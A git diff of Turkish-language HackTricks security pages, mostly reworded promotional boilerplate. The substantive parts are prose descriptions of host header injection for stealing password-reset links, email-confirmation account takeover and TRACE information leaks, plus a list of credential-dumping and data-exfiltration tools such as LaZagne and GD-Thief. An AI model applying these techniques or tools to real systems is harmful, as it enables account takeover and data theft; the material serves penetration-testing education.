+* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
+# Referans başlıkları ve politika
-# Yönlendirici başlıklar ve politika
+Referrer, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
-Yönlendirici, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
+## Hassas bilgiler sızdırıldı
-## Sızdırılan Hassas Bilgiler
-
-Bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgi bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırgan tarafından kontrol edilen bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), hassas bilgiyi en son GET isteği içinde dışarıya çıkarabilir.
+Eğer bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgiler bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırganın kontrol ettiği bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), hassas bilgileri en son GET isteği içinde dışarıya çıkarabilir.
## Hafifletme
-Tarayıcının başka web uygulamalarına hassas bilginin gönderilmesini **önleyebilecek** bir **Yönlendirici politikası** izlemesini sağlayabilirsiniz:
+Tarayıcının diğer web uygulamalarına hassas bilgilerin gönderilmesini **önleyebilecek** bir **Referrer politikası** izlemesini sağlayabilirsiniz:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
@@ -46,16 +46,17 @@ Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (sald
Asla URL'deki GET parametreleri veya yollarda hassas veri bulundurmayın.
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
-* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/todo/other-web-tricks.md b/todo/other-web-tricks.md
index 97e724682..400959755 100644
--- a/todo/other-web-tricks.md
+++ b/todo/other-web-tricks.md
@@ -1,46 +1,63 @@
# Diğer Web Hileleri
+{% hint style="success" %}
+AWS Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
-* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* Hacking hilelerini paylaşmak için **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek katkıda bulunun.
-
-### Ana bilgisayar başlığı
-
-Arka uç bazen bazı işlemleri gerçekleştirmek için **Ana Bilgisayar başlığına güvenir**. Örneğin, şifre sıfırlama bağlantısı göndermek için değerini kullanabilir. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan, Ana Bilgisayar başlığına koyduğunuz alandır. Sonra, diğer kullanıcıların şifre sıfırlama isteğinde bulunabilir ve alanı kendi kontrolünüzde olan bir alana değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [Açıklama](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
-
-{% hint style="warning" %}
-Kullanıcının sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmayın, çünkü belki de **spam filtreleri veya diğer aracı cihazlar/botlar** bağlantıyı analiz etmek için tıklar.
{% endhint %}
-### Oturum boole'ları
+### Host başlığı
-Bazen doğrulamayı doğru bir şekilde tamamladığınızda, arka uç **oturumunuzdaki bir güvenlik özniteliğine "True" değerini ekleyebilir**. Sonra, farklı bir uç nokta, o kontrolü başarıyla geçip geçmediğinizi bilecektir.\
-Ancak, eğer **kontrolü geçerseniz** ve oturumunuz güvenlik özniteliğinde "True" değerini alırsa, **aynı özniteliğe bağlı** ancak **erişim izniniz olmaması gereken diğer kaynaklara erişmeyi deneyebilirsiniz**. [Açıklama](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+Arka uç bazen bazı işlemleri gerçekleştirmek için **Host başlığına** güvenir. Örneğin, şifre sıfırlama bağlantısı göndermek için bu değeri kullanabilir. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan, Host başlığına koyduğunuz alandır. Sonra, diğer kullanıcıların şifre sıfırlama isteğinde bulunabilir ve alanı kendi kontrolünüzde olan bir alana değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [Çözüm](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
+
+{% hint style="warning" %}
+Kullanıcının sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmamanız önemlidir, çünkü belki de **spam filtreleri veya diğer aracı cihazlar/botlar bunu analiz etmek için tıklar**.
+{% endhint %}
+
+### Oturum booleanları
+
+Bazen doğrulamayı doğru bir şekilde tamamladığınızda, arka uç **oturumunuza "True" değerinde bir boolean ekleyebilir**. Sonra, farklı bir uç nokta, o kontrolü başarıyla geçip geçmediğinizi bilecektir.\
+Ancak, eğer **kontrolü geçerseniz** ve oturumunuz güvenlik özniteliğinde o "True" değerini alırsa, aynı özniteliğe bağlı **diğer kaynaklara erişmeye çalışabilirsiniz** ama aslında **erişim izniniz olmamalıdır**. [Çözüm](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### Kayıt işlevselliği
-Var olan bir kullanıcı olarak kayıt olmayı deneyin. Noktaları, çok fazla boşluk ve Unicode karakterlerini kullanarak eşdeğer karakterlerle de deneyin.
+Zaten var olan bir kullanıcı olarak kayıt olmayı deneyin. Noktaları, çok fazla boşluk ve Unicode karakterlerini kullanarak eşdeğer karakterlerle de deneyin.
### E-postaları ele geçirme
-Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, sonra eğer yeni onay e-postası ilk kayıtlı e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı etkinleştirebilirseniz, ilkini onaylayarak herhangi bir hesabı ele geçirebilirsiniz.
+Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, sonra eğer yeni onay e-postası ilk kayıtlı e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı etkinleştirebilir ve ilk e-postayı onaylayabilirseniz, herhangi bir hesabı ele geçirebilirsiniz.
-### Şirketlerin iç servis masasına erişim
+### Şirketlerin Atlassian'ı kullanan iç destek masasına erişim
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
### TRACE yöntemi
-Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi tanısal amaçlar için tasarlanmıştır. Etkinleştirilirse, web sunucusu, `TRACE` yöntemini kullanan isteklere yanıt vererek aldığı tam isteği yanıt olarak yansıtacaktır. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adını içeren bilgilerin ifşasına yol açabilir.![Gönderi için resim](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
+Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi tanıgnostik amaçlar için tasarlanmıştır. Etkinleştirilirse, web sunucusu, `TRACE` yöntemini kullanan isteklere, alınan tam isteği yanıt olarak yankılayarak yanıt verecektir. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adını içeren bilgilerin ifşasına yol açabilir.![Gönderi için resim](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Gönderi için resim](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
+
+
+{% hint style="success" %}
+AWS Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks'i Destekleyin
+
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* Hacking hilelerini paylaşmak için **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek katkıda bulunun.
+
+
+{% endhint %}
diff --git a/todo/pentesting-dns.md b/todo/pentesting-dns.md
index 98e50a2d2..94d47e062 100644
--- a/todo/pentesting-dns.md
+++ b/todo/pentesting-dns.md
@@ -1,16 +1,17 @@
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
-* **Hacking hilelerinizi paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
**DNS saldırıları hakkında daha fazla araştırma yapın**
diff --git a/todo/post-exploitation.md b/todo/post-exploitation.md
index 0b2c4bfb4..ba967f72e 100644
--- a/todo/post-exploitation.md
+++ b/todo/post-exploitation.md
@@ -1,27 +1,43 @@
+{% hint style="success" %}
+Öğren ve AWS Hacking pratiği yap:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Öğren ve GCP Hacking pratiği yap:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekle
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
-* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR gönderin.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
+* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
+{% endhint %}
## **Yerel Ganimet**
-* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp, dosya sistemi içinde hassas bilgileri arayacak.
-* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı teknikler kullanarak (düz metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
+* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp dosya sistemi içinde hassas bilgiler arayacak.
+* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı tekniklerle (açık metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
## **Harici Hizmetler**
-* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence'nin API'sine bağlanacak, PDF'e aktaracak ve Confluence belgelerini indirecek.
-* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları dışa aktarmak için Kırmızı Takım aracı, Google Drive API'si aracılığıyla. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu alan sürücülerinden tüm dosyaları içerir.
-* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Hedef organizasyonunun Google Kişi Dizinini dışa aktarmak için Kırmızı Takım aracı, Google'ın Kişiler API'si aracılığıyla erişiminiz olan Google Kişi Dizini.
+* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence API'sine bağlanacak, PDF'ye aktaracak ve hedefin erişimine sahip olduğu Confluence belgelerini indirecek.
+* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team aracı, hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları Google Drive API'si aracılığıyla dışa aktarmak için kullanılır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu etki alanı sürücülerinden tüm dosyaları içerir.
+* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team aracı, erişiminiz olan hedef organizasyonunun Google Kişiler Dizinini Google'ın Kişiler API'si aracılığıyla dışa aktarmak için kullanılır.
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerel Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
-* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun hızlı bir şekilde keşfedilmesini sağlamak için kırmızı ve mavi takımlar için bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
+* [**Slackhound**](https://github.com/BojackThePillager): Slackhound, kırmızı ve mavi takımların hızlı bir şekilde bir Slack çalışma alanının/organizasyonunun keşfini yapmasına olanak tanıyan bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
+
+{% hint style="success" %}
+Öğren ve AWS Hacking pratiği yap:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Öğren ve GCP Hacking pratiği yap:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks'i Destekle
+
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
+* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
+
+
+{% endhint %}